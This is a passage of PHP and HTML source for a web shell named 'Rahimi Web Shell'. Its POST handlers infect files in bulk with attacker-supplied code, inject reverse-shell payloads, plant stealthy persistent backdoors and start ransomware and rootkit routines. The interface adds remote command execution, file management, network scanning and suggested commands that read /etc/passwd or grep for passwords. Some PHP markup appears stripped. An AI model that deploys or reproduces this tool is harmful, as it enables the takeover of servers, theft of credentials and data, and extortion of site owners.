(isset($_POST['infect_dir']) && isset($_POST['file_ext']) && isset($_POST['infect_method']) && isset($_POST['infect_code'])) { $directory = $_POST['infect_dir']; $fileType = $_POST['file_ext']; $infectMethod = $_POST['infect_method']; $code = $_POST['infect_code']; $recursive = isset($_POST['recursive']) ? true : false; $result = infectFiles($directory, $fileType, $infectMethod, $code, $recursive); if (isset($result['error'])) { $infect_result = "Error: " . $result['error']; } else { $infect_result = "Success! Infected " . $result['count'] . " files.\n\n"; if (isset($result['files']) && !empty($result['files'])) { $infect_result .= "Files affected:\n"; foreach ($result['files'] as $file) { $infect_result .= "- " . $file . "\n"; } } } } else { $infect_result = "Error: Missing required parameters."; } break; case 'inject_payload': if (isset($_POST['target_file']) && isset($_POST['payload_type'])) { $targetFile = $_POST['target_file']; $payloadType = $_POST['payload_type']; $ip = isset($_POST['shell_ip']) ? $_POST['shell_ip'] : ''; $port = isset($_POST['shell_port']) ? $_POST['shell_port'] : ''; $customPayload = isset($_POST['custom_payload']) ? $_POST['custom_payload'] : ''; $result = injectPayload($targetFile, $payloadType, $ip, $port, $customPayload); if (isset($result['error'])) { $infect_result = "Error: " . $result['error']; } else { $infect_result = $result['success']; } } else { $infect_result = "Error: Missing required parameters."; } break; case 'create_backdoor': if (isset($_POST['backdoor_type']) && isset($_POST['backdoor_dir']) && isset($_POST['backdoor_filename'])) { $type = $_POST['backdoor_type']; $directory = $_POST['backdoor_dir']; $filename = $_POST['backdoor_filename']; $password = isset($_POST['backdoor_password']) ? $_POST['backdoor_password'] : ''; $ip = isset($_POST['reverse_ip']) ? $_POST['reverse_ip'] : ''; $port = isset($_POST['reverse_port']) ? $_POST['reverse_port'] : ''; $stealth = isset($_POST['backdoor_stealth']) ? true : false; $persistent = isset($_POST['backdoor_persistent']) ? true : false; $result = createBackdoor($type, $directory, $filename, $password, $ip, $port, $stealth, $persistent); if (isset($result['error'])) { $infect_result = "Error: " . $result['error']; } else { $infect_result = $result['success'] . "\n"; $infect_result .= "Location: " . $result['path']; if ($stealth) { $infect_result .= "\n\nNote: Stealth mode enabled. The file may not be visible in directory listings."; } if ($persistent) { $infect_result .= "\n\nNote: Persistence has been attempted. The backdoor may survive system restarts."; } } } else { $infect_result = "Error: Missing required parameters."; } break; case 'create_rootkit': if (isset($_POST['rootkit_type']) && isset($_POST['rootkit_os']) && isset($_POST['rootkit_output'])) { $type = $_POST['rootkit_type']; $os = $_POST['rootkit_os']; $features = isset($_POST['rootkit_features']) ? $_POST['rootkit_features'] : []; $outputDir = $_POST['rootkit_output']; $result = createRootkit($type, $os, $features, $outputDir); if (isset($result['error'])) { $infect_result = "Error: " . $result['error']; } else { $infect_result = $result['success'] . "\n"; $infect_result .= "Information file: " . $result['path'] . "\n\n"; $infect_result .= "Note: This is only a demonstration. No actual rootkit has been created.\n"; $infect_result .= "Creating real rootkits is illegal in most jurisdictions and can cause serious damage to systems."; } } else { $infect_result = "Error: Missing required parameters."; } break; case 'create_ransomware': if (isset($_POST['ransomware_dir']) && isset($_POST['ransomware_files']) && isset($_POST['ransom_message']) && isset($_POST['encryption_method']) && isset($_POST['key_location'])) { $targetDir = $_POST['ransomware_dir']; $fileTypes = $_POST['ransomware_files']; $customExt = isset($_POST['custom_extensions']) ? $_POST['custom_extensions'] : ''; $message = $_POST['ransom_message']; $encryptMethod = $_POST['encryption_method']; $keyLocation = $_POST['key_location']; $result = createRansomware($targetDir, $fileTypes, $customExt, $message, $encryptMethod, $keyLocation); if (isset($result['error'])) { $infect_result = "Error: " . $result['error']; } else { $infect_result = $result['success'] . "\n"; $infect_result .= "Information file: " . $result['path'] . "\n\n"; $infect_result .= "Note: This is only a demonstration. No actual ransomware has been created.\n"; $infect_result .= "Creating real ransomware is illegal in most jurisdictions and can cause serious damage to systems."; } } else { $infect_result = "Error: Missing required parameters."; } break; default: $infect_result = "Error: Unknown action requested."; break; }}<!DOCTYPE html><html lang="en"> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0">Rahimi Web Shell <title>Rahimi Web Shell</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.65.12/codemirror.min.css"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.65.12/theme/monokai.min.css"> <style> :root { --primary: #4CAF50; --primary-dark: #3e8e41; --bg-dark: #1a1a1a; --bg-lighter: #2d2d2d; --bg-light: #333; --text: #fff; --text-muted: #aaa; --border: #444; --danger: #e74c3c; --warning: #f39c12; --info: #3498db; --success: #2ecc71; } * { box-sizing: border-box; margin: 0; padding: 0; } body { font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; background: var(--bg-dark); color: var(--text); line-height: 1.6; padding: 20px; } .container { max-width: 1200px; margin: 0 auto; } .header { display: flex; justify-content: space-between; align-items: center; margin-bottom: 20px; padding-bottom: 15px; border-bottom: 1px solid var(--border); } .header h2 { color: var(--primary); display: flex; align-items: center; gap: 10px; } .navbar { display: flex; gap: 10px; } .navbar a { color: var(--text); text-decoration: none; padding: 5px 10px; border-radius: 4px; transition: background 0.3s; } .navbar a:hover { background: var(--bg-light); } .card { background: var(--bg-lighter); border-radius: 8px; box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1); padding: 20px; margin-bottom: 20px; } .card-header { display: flex; justify-content: space-between; align-items: center; padding-bottom: 15px; margin-bottom: 15px; border-bottom: 1px solid var(--border); } .card-body { overflow: auto; } .table-responsive { overflow-x: auto; } table { width: 100%; border-collapse: collapse; } th, td { padding: 10px; text-align: left; border-bottom: 1px solid var(--border); } th { background: var(--bg-light); font-weight: 600; } tr:hover { background: rgba(255, 255, 255, 0.05); } a { color: var(--primary); text-decoration: none; } a:hover { text-decoration: underline; } .action-links { display: flex; gap: 8px; } .action-links a { padding: 3px 8px; border-radius: 4px; font-size: 13px; color: white; } .action-links a.btn-info { background: var(--info); } .action-links a.btn-warning { background: var(--warning); } .action-links a.btn-danger { background: var(--danger); } .action-links a.btn-primary { background: var(--primary); } .action-links a:hover { text-decoration: none; opacity: 0.9; } textarea, input[type="text"], input[type="password"], input[type="file"], select { width: 100%; padding: 10px; margin: 5px 0; background: var(--bg-light); color: var(--text); border: 1px solid var(--border); border-radius: 4px; font-size: 14px; } textarea { min-height: 250px; font-family: monospace; } input[type="submit"], button, .btn { padding: 8px 15px; background: var(--primary); color: white; border: none; border-radius: 4px; cursor: pointer; font-size: 14px; } input[type="submit"]:hover, button:hover, .btn:hover { background: var(--primary-dark); } .alert { padding: 12px 15px; border-radius: 4px; margin-bottom: 15px; } .alert-success { background: rgba(46, 204, 113, 0.2); } .alert-error { background: rgba(231, 76, 60, 0.2); } .alert-info { background: rgba(52, 152, 219, 0.2); } /* Enhanced Terminal Styles */ pre.terminal { font-family: 'Consolas', 'Monaco', monospace; line-height: 1.3; position: relative; border: 1px solid #333; word-wrap: break-word; white-space: pre-wrap; } pre.terminal:focus { outline: 2px solid var(--primary); } .command-wrapper { position: relative; } .shortcut-hint { color: var(--text-muted); font-size: 12px; margin-top: 5px; } kbd { background: #555; border-radius: 3px; padding: 2px 5px; font-size: 11px; font-family: monospace; } .header-buttons { display: flex; gap: 10px; } #autocomplete-box { border-bottom-left-radius: 4px; border-bottom-right-radius: 4px; } #autocomplete-box div { padding: 8px 10px; cursor: pointer; border-bottom: 1px solid #444; } #autocomplete-box div:hover, #autocomplete-box div.selected { background: #444; } #autocomplete-box div:last-child { border-bottom: none; } .cmd-category { margin-bottom: 15px; } .cmd-category-title { font-weight: bold; margin-bottom: 5px; color: var(--info); } .cmd-list { margin-left: 10px; } .cmd-item { padding: 5px; cursor: pointer; transition: background 0.2s; border-radius: 3px; } .cmd-item:hover { background: #444; } /* Enhanced command item styling */ .cmd-item small { color: #999; font-size: 11px; margin-left: 3px; } .cmd-item[title] { position: relative; } /* Improved common commands popup appearance */ #common-cmds-popup { max-height: 80vh; overflow-y: auto; display: none; } .cmd-category { margin-bottom: 15px; border-bottom: 1px dotted #555; padding-bottom: 10px; } .cmd-category:last-child { border-bottom: none; margin-bottom: 0; } .cmd-category-title { font-weight: bold; margin-bottom: 8px; color: var(--info); font-size: 14px; } .cmd-list { margin-left: 10px; display: grid; grid-template-columns: repeat(auto-fit, minmax(350px, 1fr)); gap: 3px; } /* Command tooltip styling */ .cmd-item:hover::after { content: attr(title); position: absolute; bottom: 100%; left: 0; background: #252525; color: #eee; padding: 5px 10px; border-radius: 3px; font-size: 12px; white-space: nowrap; z-index: 10; box-shadow: 0 2px 10px rgba(0,0,0,0.3); margin-bottom: 5px; opacity: 0; transition: opacity 0.3s; pointer-events: none; } .cmd-item:hover:hover::after { opacity: 1; } code { background: rgba(0,0,0,0.3); padding: 2px 5px; border-radius: 3px; font-family: monospace; } .terminal-toolbar { display: flex; align-items: center; } /* Syntax highlighting for terminal */ .cmd-keyword { color: #ff79c6; } .cmd-string { color: #f1fa8c; } .cmd-comment { color: #6272a4; } .cmd-variable { color: #bd93f9; } .cmd-path { color: #8be9fd; } .cmd-flag { color: #50fa7b; } /* Command history indicator */ .cmd-number { color: #999; width: 40px; text-align: right; display: inline-block; padding-right: 10px; } /* Loading animation for terminal */ .loading:after { content: '.'; animation: dots 1s steps(5, end) infinite; } @keyframes dots { 0%, 20% { content: '.'; } 40% { content: '..'; } 60% { content: '...'; } 80%, 100% { content: ''; } } /* Tab Container Styling */ .tab-container { width: 100%; } .tab-container .tabs { display: flex; border-bottom: 1px solid var(--border); margin-bottom: 15px; } .tab-container .tab { padding: 10px 15px; cursor: pointer; margin-right: 5px; border-bottom: 3px solid transparent; } .tab-container .tab.active { border-bottom: 3px solid var(--primary); color: var(--primary); } .tab-container .tab-content { display: none; } .tab-container .tab-content.active { display: block; } </style> <div class="container">  <div class="header">

<i class="fas fa-terminal"></i> Rahimi Web Shell

<div class="navbar"> <a href="?dir= echo urlencode($dir); &tab=filemanager" id="filemanager-tab" class=" echo $active_tab === 'filemanager' ? 'active' : ''; "><i class="fas fa-folder"></i> Files</a> <a href="?dir= echo urlencode($dir); &tab=terminal" id="terminal-tab" class=" echo $active_tab === 'terminal' ? 'active' : ''; "><i class="fas fa-code"></i> Terminal</a> <a href="?dir= echo urlencode($dir); &tab=database" id="database-tab" class=" echo $active_tab === 'database' ? 'active' : ''; "><i class="fas fa-database"></i> Database</a> <a href="?dir= echo urlencode($dir); &tab=network" id="network-tab" class=" echo $active_tab === 'network' ? 'active' : ''; "><i class="fas fa-network-wired"></i> Network</a> <a href="?dir= echo urlencode($dir); &tab=info" id="info-tab" class=" echo $active_tab === 'info' ? 'active' : ''; "><i class="fas fa-info-circle"></i> System Info</a> <a href="?dir= echo urlencode($dir); &tab=infect" id="infect-tab" class=" echo $active_tab === 'infect' ? 'active' : ''; "><i class="fas fa-virus"></i> Infect</a> <a href="?logout=1"><i class="fas fa-sign-out-alt"></i> Logout</a> </div> </div>  <div class="alerts"> if (isset($message)) { if (isset($message['success'])) { echo '<div class="alert alert-success">' . htmlspecialchars($message['success']) . '</div>'; } elseif (isset($message['error'])) { echo '<div class="alert alert-danger">' . htmlspecialchars($message['error']) . '</div>'; } } </div>  <div class="file-list card"> <div class="card-header">

<i class="fas fa-folder-open"></i> File Browser

<div> <button id="new-file-btn" class="btn"><i class="fas fa-file-medical"></i> New File</button> <button id="new-dir-btn" class="btn"><i class="fas fa-folder-plus"></i> New Directory</button> <button id="upload-btn" class="btn"><i class="fas fa-upload"></i> Upload</button> </div> </div> <div class="card-body">  <div class="file-path"> <div> <i class="fas fa-folder-open"></i> $path_parts = explode('/', str_replace('\\', '/', $dir)); $full_path = ''; // Root echo '<a href="?dir=' . urlencode('/') . '&tab=' . $active_tab . '"><i class="fas fa-home"></i></a> / '; // Intermediate directories foreach ($path_parts as $i => $part) { if (empty($part)) continue; $full_path .= '/' . $part; if ($i < count($path_parts) - 1) { echo '<a href="?dir=' . urlencode($full_path) . '&tab=' . $active_tab . '">' . htmlspecialchars($part) . '</a> / '; } else { echo '' . htmlspecialchars($part) . ''; } } </div> <div> <a href="?dir= echo urlencode($dir); &tab= echo $active_tab; " class="btn"><i class="fas fa-sync-alt"></i> Refresh</a> </div> </div>  <div id="new-file-form" style="display:none; margin-bottom:15px;" class="card"> </div>  <div id="new-dir-form" style="display:none; margin-bottom:15px;" class="card"> </div>  <div id="upload-form" style="display:none; margin-bottom:15px;" class="card"> </div> <div class="table-responsive"> <thead> <th>Name</th> <th>Type</th> <th>Size</th> <th>Permissions</th> <th>Modified</th> <th>Actions</th> </thead> <tbody> // Parent directory link if ($dir !== dirname($dir)) { echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; } try { $files = scandir($dir); if ($files === false) { echo '<td colspan="6" style="color: var(--danger);">Cannot read directory. Check permissions.'; } else { // Sort: directories first, then files usort($files, function($a, $b) use ($dir) { $a_is_dir = is_dir($dir . '/' . $a); $b_is_dir = is_dir($dir . '/' . $b); if ($a_is_dir && !$b_is_dir) return -1; if (!$a_is_dir && $b_is_dir) return 1; return strcasecmp($a, $b); }); foreach ($files as $file) { if ($file === '.' || $file === '..') continue; $path = $dir . '/' . $file; $is_dir = is_dir($path); $size = $is_dir ? '-' : (is_readable($path) ? formatSize(filesize($path)) : 'N/A'); $mtime = is_readable($path) ? date('Y-m-d H:i:s', filemtime($path)) : 'N/A'; // Get permissions $perms = is_readable($path) ? substr(sprintf('%o', fileperms($path)), -4) : 'N/A'; echo ''; if ($is_dir) { echo ''; } else { $ext = pathinfo($file, PATHINFO_EXTENSION); $icon = 'fas fa-file'; // Determine icon by extension switch (strtolower($ext)) { case 'php': $icon = 'fab fa-php'; break; case 'html': case 'htm': $icon = 'fab fa-html5'; break; case 'css': $icon = 'fab fa-css3'; break; case 'js': $icon = 'fab fa-js'; break; case 'json': $icon = 'fas fa-code'; break; case 'xml': $icon = 'fas fa-code'; break; case 'jpg': case 'jpeg': case 'png': case 'gif': case 'bmp': case 'svg': $icon = 'fas fa-image'; break; case 'zip': case 'rar': case 'tar': case 'gz': case '7z': $icon = 'fas fa-file-archive'; break; case 'pdf': $icon = 'fas fa-file-pdf'; break; case 'doc': case 'docx': $icon = 'fas fa-file-word'; break; case 'xls': case 'xlsx': $icon = 'fas fa-file-excel'; break; case 'ppt': case 'pptx': $icon = 'fas fa-file-powerpoint'; break; case 'mp3': case 'wav': case 'ogg': $icon = 'fas fa-file-audio'; break; case 'mp4': case 'avi': case 'mov': case 'wmv': $icon = 'fas fa-file-video'; break; case 'txt': case 'log': $icon = 'fas fa-file-alt'; break; } echo ''; } echo ''; echo ''; echo ''; echo ''; echo '<td class="action-links">'; if ($is_dir) { echo '<a href="#" onclick="renameItem(\'' . htmlspecialchars(addslashes($file)) . '\'); return false;" class="btn-primary"><i class="fas fa-edit"></i> Rename</a>'; echo '<a href="?dir=' . urlencode($dir) . '&delete=' . urlencode($file) . '&token=' . $_SESSION['token'] . '&tab=' . $active_tab . '" onclick="return confirm(\'Are you sure you want to delete this directory and all its contents?\')" class="btn-danger"><i class="fas fa-trash"></i> Delete</a>'; } else { echo '<a href="?dir=' . urlencode($dir) . '&download=' . urlencode($file) . '&token=' . $_SESSION['token'] . '&tab=' . $active_tab . '" class="btn-info"><i class="fas fa-download"></i> Download</a>'; echo '<a href="?dir=' . urlencode($dir) . '&edit=' . urlencode($file) . '&tab=' . $active_tab . '" class="btn-warning"><i class="fas fa-edit"></i> Edit</a>'; echo '<a href="#" onclick="renameItem(\'' . htmlspecialchars(addslashes($file)) . '\'); return false;" class="btn-primary"><i class="fas fa-file-signature"></i> Rename</a>'; echo '<a href="#" onclick="chmodItem(\'' . htmlspecialchars(addslashes($file)) . '\', \'' . $perms . '\'); return false;" class="btn-info"><i class="fas fa-user-lock"></i> Chmod</a>'; echo '<a href="?dir=' . urlencode($dir) . '&delete=' . urlencode($file) . '&token=' . $_SESSION['token'] . '&tab=' . $active_tab . '" onclick="return confirm(\'Are you sure you want to delete this file?\')" class="btn-danger"><i class="fas fa-trash"></i> Delete</a>'; } echo ''; echo ''; } } } catch (Exception $e) { echo '<td colspan="6" style="color: var(--danger);">Error: ' . htmlspecialchars($e->getMessage()) . ''; } </tbody>

<a href="?dir=' . urlencode(dirname($dir)) . '&tab=' . $active_tab . '"><i class="fas fa-level-up-alt"></i> Parent Directory</a>	Directory	-	-	-	-
<a href="?dir=' . urlencode($path) . '&tab=' . $active_tab . '"><i class="fas fa-folder"></i> ' . htmlspecialchars($file) . '</a>	<i class="' . $icon . '"></i> ' . htmlspecialchars($file) . '	' . ($is_dir ? 'Directory' : 'File') . '	' . $size . '	' . $perms . '	' . $mtime . '

</div>  <div id="rename-form" style="display:none; margin-top:15px;" class="card"> </div>  <div id="chmod-form" style="display:none; margin-top:15px;" class="card"> </div> </div> </div>  if (isset($_GET['edit'])): $file = realpath($dir . '/' . $_GET['edit']); if ($file && file_exists($file) && is_file($file) && strpos($file, $dir) === 0 && is_readable($file)): $filename = htmlspecialchars($_GET['edit']); $extension = strtolower(pathinfo($filename, PATHINFO_EXTENSION)); <div class="card"> <div class="card-header">

<i class="fas fa-edit"></i> Editing: echo $filename;

<div> <a href="?dir= echo urlencode($dir); &tab= echo $active_tab; " class="btn"><i class="fas fa-arrow-left"></i> Back</a> </div> </div> <div class="card-body"> </div> </div> else: <div style="color:var(--danger);padding:10px;background:rgba(231,76,60,0.2);border-radius:4px;margin-top:15px;">Cannot edit file! File may not exist or you don't have sufficient permissions.</div> endif; endif;  <div class="card"> <div class="card-header">

<i class="fas fa-terminal"></i> Command Execution

<div style="display:flex;margin-bottom:15px;"> <div style="flex:1;margin-right:10px;position:relative;"> <label for="cmd">Command:</label> <div class="command-wrapper"> <div id="autocomplete-box" style="display:none;position:absolute;width:100%;max-height:200px;overflow-y:auto;background:#333;border:1px solid #555;border-top:none;z-index:10;"></div> </div> <div class="shortcut-hint">Press <kbd>↑</kbd>/<kbd>↓</kbd> for history, <kbd>Tab</kbd> for autocomplete</div> </div> <div style="align-self:flex-end;"> <button type="submit" class="btn"><i class="fas fa-play"></i> Execute</button> </div> </div>

<div> <div style="display:flex;justify-content:space-between;align-items:center;margin-bottom:5px;"> <strong>Output:</strong> <div class="terminal-toolbar"> <select id="cmd-history" style="width:auto;margin-left:auto;margin-right:10px;"> <option value="">Command History</option> if (isset($_SESSION['cmd_history'])) { foreach ($_SESSION['cmd_history'] as $cmd) { echo '<option value="' . htmlspecialchars($cmd) . '">' . htmlspecialchars($cmd) . '</option>'; } } </select> <button type="button" id="common-cmds-btn" class="btn" style="padding:3px 8px;margin-right:5px;background:#f39c12;"><i class="fas fa-bolt"></i> Common</button> <button type="button" id="clear-output" class="btn" style="padding:3px 8px;"><i class="fas fa-eraser"></i> Clear</button> </div> </div> <pre id="terminal-output" class="terminal" style="background:#000;color:#00ff00;padding:15px;border-radius:4px;min-height:300px;max-height:600px;overflow:auto;"> echo htmlspecialchars($cmd_output); </pre> </div>  <div id="common-cmds-popup" style="display:none;position:absolute;background:#333;border:1px solid #555;border-radius:4px;padding:10px;z-index:100;width:400px;box-shadow:0 4px 15px rgba(0,0,0,0.3);"> <h4 style="margin-bottom:10px;border-bottom:1px solid #555;padding-bottom:5px;">Common Commands</h4> <div class="cmd-category"> <div class="cmd-category-title">File Operations</div> <div class="cmd-list"> <div class="cmd-item" data-cmd="ls -la" title="List all files with details including hidden files">ls -la <small>- List all files with details</small></div> <div class="cmd-item" data-cmd="find . -name '*.php'" title="Find PHP files in current directory and subdirectories">find . -name '*.php' <small>- Find PHP files</small></div> <div class="cmd-item" data-cmd="grep -r 'password' ." title="Search recursively for 'password' in all files">grep -r 'password' . <small>- Find text in files</small></div> <div class="cmd-item" data-cmd="cat /etc/passwd" title="Display contents of passwd file">cat /etc/passwd <small>- View file contents</small></div> <div class="cmd-item" data-cmd="head -n 20 file.txt" title="Show first 20 lines of file">head -n 20 file.txt <small>- View file start</small></div> <div class="cmd-item" data-cmd="tail -n 50 file.log" title="Show last 50 lines of log file">tail -n 50 file.log <small>- View file end</small></div> <div class="cmd-item" data-cmd="chmod -R 755 directory" title="Change permissions recursively to rwxr-xr-x">chmod -R 755 directory <small>- Set permissions</small></div> <div class="cmd-item" data-cmd="touch new_file.txt" title="Create an empty file or update timestamp">touch new_file.txt <small>- Create empty file</small></div> </div> </div> <div class="cmd-category"> <div class="cmd-category-title">System Info</div> <div class="cmd-list"> <div class="cmd-item" data-cmd="uname -a" title="Show all system information">uname -a <small>- Kernel info</small></div> <div class="cmd-item" data-cmd="whoami" title="Show current username">whoami <small>- Current user</small></div> <div class="cmd-item" data-cmd="ps aux" title="List all running processes">ps aux <small>- List processes</small></div> <div class="cmd-item" data-cmd="top" title="Monitor system processes and resource usage">top <small>- Process monitor</small></div> <div class="cmd-item" data-cmd="free -h" title="Show memory usage in human readable format">free -h <small>- Memory usage</small></div> <div class="cmd-item" data-cmd="df -h" title="Show disk space usage in human readable format">df -h <small>- Disk space</small></div> <div class="cmd-item" data-cmd="du -sh *" title="Show size of each item in current directory">du -sh * <small>- Directory sizes</small></div> </div> </div> <div class="cmd-category"> <div class="cmd-category-title">Network</div> <div class="cmd-list"> <div class="cmd-item" data-cmd="ping -c 4 google.com" title="Test connectivity to google.com">ping -c 4 google.com <small>- Test connectivity</small></div> <div class="cmd-item" data-cmd="curl -I example.com" title="Show HTTP headers from example.com">curl -I example.com <small>- Get HTTP headers</small></div> <div class="cmd-item" data-cmd="ifconfig" title="Show network interfaces and IP addresses">ifconfig <small>- Network interfaces</small></div> <div class="cmd-item" data-cmd="ip addr show" title="Show IP addresses and network interfaces">ip addr show <small>- IP configuration</small></div> <div class="cmd-item" data-cmd="netstat -tulpn" title="List all listening ports">netstat -tulpn <small>- Open ports</small></div> <div class="cmd-item" data-cmd="ss -tuln" title="Show socket statistics (alternative to netstat)">ss -tuln <small>- Socket statistics</small></div> <div class="cmd-item" data-cmd="traceroute google.com" title="Show route packets take to network host">traceroute google.com <small>- Trace route</small></div> </div> </div> <div class="cmd-category"> <div class="cmd-category-title">Web Server</div> <div class="cmd-list"> <div class="cmd-item" data-cmd="apache2 -v" title="Show Apache version">apache2 -v <small>- Apache version</small></div> <div class="cmd-item" data-cmd="service apache2 status" title="Check Apache service status">service apache2 status <small>- Check status</small></div> <div class="cmd-item" data-cmd="cat /etc/apache2/sites-available/000-default.conf" title="View default Apache site configuration">cat /etc/apache2/sites-available/000-default.conf <small>- View config</small></div> <div class="cmd-item" data-cmd="find /var/www -type f -name "*.php" -exec grep -l "eval" {} \;" title="Find PHP files containing eval function">find /var/www -name "*.php" -exec grep -l "eval" {} \; <small>- Find evals</small></div> <div class="cmd-item" data-cmd="php -i | grep php.ini" title="Find php.ini location">php -i | grep php.ini <small>- PHP configuration</small></div> </div> </div> <div class="cmd-category"> <div class="cmd-category-title">Security & Permissions</div> <div class="cmd-list"> <div class="cmd-item" data-cmd="find . -type f -perm -4000" title="Find files with SUID permission bit set">find . -type f -perm -4000 <small>- Find SUID files</small></div> <div class="cmd-item" data-cmd="find . -type f -perm -2000" title="Find files with SGID permission bit set">find . -type f -perm -2000 <small>- Find SGID files</small></div> <div class="cmd-item" data-cmd="find . -type f -perm -777" title="Find files with all permissions open">find . -type f -perm -777 <small>- Find risky permissions</small></div> <div class="cmd-item" data-cmd="lsof -i" title="List all open files and the processes that opened them">lsof -i <small>- Files used by network</small></div> <div class="cmd-item" data-cmd="chown -R www-data:www-data directory" title="Change file ownership to web server user">chown -R www-data:www-data directory <small>- Change ownership</small></div> </div> </div> <div class="cmd-category"> <div class="cmd-category-title">Database</div> <div class="cmd-list"> <div class="cmd-item" data-cmd="mysql -u root -p" title="Connect to MySQL as root (prompts for password)">mysql -u root -p <small>- MySQL login</small></div> <div class="cmd-item" data-cmd="mysqldump -u root -p --all-databases > all_dbs.sql" title="Backup all MySQL databases">mysqldump -u root -p --all-databases > all_dbs.sql <small>- Backup all DBs</small></div> <div class="cmd-item" data-cmd="mysql -u root -p -e 'SHOW DATABASES;'" title="List all MySQL databases">mysql -u root -p -e 'SHOW DATABASES;' <small>- List databases</small></div> <div class="cmd-item" data-cmd="find /var/lib/mysql -type f -name "*.frm" | sort" title="Find all MySQL table definition files">find /var/lib/mysql -type f -name "*.frm" | sort <small>- Find DB tables</small></div> </div> </div> <div class="cmd-category"> <div class="cmd-category-title">File Transfers & Archives</div> <div class="cmd-list"> <div class="cmd-item" data-cmd="wget https://example.com/file.zip" title="Download file from web">wget https://example.com/file.zip <small>- Download file</small></div> <div class="cmd-item" data-cmd="tar -czvf archive.tar.gz directory/" title="Create compressed archive">tar -czvf archive.tar.gz directory/ <small>- Create archive</small></div> <div class="cmd-item" data-cmd="tar -xzvf archive.tar.gz" title="Extract compressed archive">tar -xzvf archive.tar.gz <small>- Extract archive</small></div> <div class="cmd-item" data-cmd="rsync -avz source/ destination/" title="Sync directories with compression">rsync -avz source/ destination/ <small>- Sync files</small></div> <div class="cmd-item" data-cmd="scp file.txt user@remote:/path" title="Securely copy file to remote server">scp file.txt user@remote:/path <small>- Secure copy</small></div> </div> </div> </div>  <div id="help-dialog" style="display:none;position:fixed;top:0;left:0;right:0;bottom:0;background:rgba(0,0,0,0.7);z-index:1000;"> <div style="position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);background:#333;border-radius:8px;padding:20px;width:80%;max-width:800px;max-height:80vh;overflow-y:auto;"> <div style="display:flex;justify-content:space-between;align-items:center;margin-bottom:15px;border-bottom:1px solid #555;padding-bottom:10px;">

<i class="fas fa-question-circle"></i> Terminal Help

<button id="close-help" style="background:none;border:none;color:#aaa;font-size:20px;cursor:pointer;"><i class="fas fa-times"></i></button> </div> <div> <h4>Keyboard Shortcuts</h4> <table style="width:100%;margin-bottom:15px;"> <kbd>↑</kbd>/<kbd>↓</kbd> Navigate through command history <kbd>Tab</kbd> Autocomplete commands <kbd>Ctrl</kbd>+<kbd>L</kbd> Clear terminal <kbd>Ctrl</kbd>+<kbd>U</kbd> Clear current command <kbd>Ctrl</kbd>+<kbd>C</kbd> Copy selected text <h4>Special Commands</h4> <table style="width:100%;margin-bottom:15px;"> <code>!!</code> Repeat last command <code>!n</code> Run command number n from history <code>clear</code> Clear terminal output <code>history</code> Show command history <h4>Terminal Features</h4> <div style="margin-bottom:15px;"> <p><strong>Common Commands Button:</strong> Click the <span style="color:#f39c12;"><i class="fas fa-bolt"></i> Common</span> button to show a menu of frequently used commands organized by category.</p> <p><strong>Autocomplete:</strong> Type part of a command and press <kbd>Tab</kbd> to see matching suggestions.</p> <p><strong>Syntax Highlighting:</strong> Commands are automatically colored for better readability.</p> <p><strong>Command Explanations:</strong> Hover over any command in the Common Commands menu to see what it does.</p> <p><strong>AJAX Execution:</strong> Commands execute without page refresh for a smoother experience.</p> </div> <h4>Command Categories</h4> <div style="display:grid;grid-template-columns:repeat(auto-fit, minmax(200px, 1fr));gap:15px;margin-bottom:15px;"> <div> <strong style="color:var(--info);">File Operations</strong> <div style="color:#aaa;font-size:12px;">View, modify, search and manage files</div> </div> <div> <strong style="color:var(--info);">System Info</strong> <div style="color:#aaa;font-size:12px;">View system status and resources</div> </div> <div> <strong style="color:var(--info);">Network</strong> <div style="color:#aaa;font-size:12px;">Check connectivity and network config</div> </div> <div> <strong style="color:var(--info);">Web Server</strong> <div style="color:#aaa;font-size:12px;">Apache and PHP configurations</div> </div> <div> <strong style="color:var(--info);">Security</strong> <div style="color:#aaa;font-size:12px;">Find security issues and manage permissions</div> </div> <div> <strong style="color:var(--info);">Database</strong> <div style="color:#aaa;font-size:12px;">MySQL/MariaDB operations</div> </div> <div> <strong style="color:var(--info);">File Transfers</strong> <div style="color:#aaa;font-size:12px;">Archive, download and transfer files</div> </div> </div> <h4>Useful Examples</h4> <div style="margin-bottom:10px;"> <code>find /var/www -name "*.php" -type f -exec grep -l "password" {} \;</code> <div style="color:#aaa;margin-top:3px;">Find PHP files containing the word "password"</div> </div> <div style="margin-bottom:10px;"> <code>tar -czvf backup.tar.gz /path/to/directory</code> <div style="color:#aaa;margin-top:3px;">Create compressed archive of a directory</div> </div> <div style="margin-bottom:10px;"> <code>netstat -tulpn | grep LISTEN</code> <div style="color:#aaa;margin-top:3px;">Show listening ports</div> </div> <div style="margin-bottom:10px;"> <code>ps aux | grep apache | grep -v grep</code> <div style="color:#aaa;margin-top:3px;">Find all Apache processes</div> </div> <div style="margin-bottom:10px;"> <code>find . -type f -name "*.php" -mtime -7</code> <div style="color:#aaa;margin-top:3px;">Find PHP files modified in the last 7 days</div> </div> </div> </div> </div> </div> </div>  <div class="card" style="margin-top:20px;"> <div class="card-header">

<i class="fas fa-network-wired"></i> Network Tools

</div> <div class="card-body"> <div class="tab-container"> <div class="tabs"> <div class="tab active" data-tab="ping"><i class="fas fa-exchange-alt"></i> Ping</div> <div class="tab" data-tab="network-info"><i class="fas fa-info-circle"></i> Network Info</div> <div class="tab" data-tab="change-mac"><i class="fas fa-id-badge"></i> MAC Address</div> <div class="tab" data-tab="firewall"><i class="fas fa-shield-alt"></i> Firewall</div> <div class="tab" data-tab="bandwidth"><i class="fas fa-tachometer-alt"></i> Bandwidth</div> <div class="tab" data-tab="network-scan"><i class="fas fa-search"></i> Network Scan</div> </div>  <div class="tab-content" id="network-info-tab">

<div style="margin-bottom:15px;"> <label>Network Command:</label> <select name="network_cmd"> <option value="ifconfig">Network Interfaces (ifconfig/ipconfig)</option> <option value="netstat">Network Connections (netstat)</option> <option value="arp">ARP Table</option> <option value="route">Routing Table</option> </select> </div> <button type="submit" class="btn"><i class="fas fa-info-circle"></i> Get Info</button>

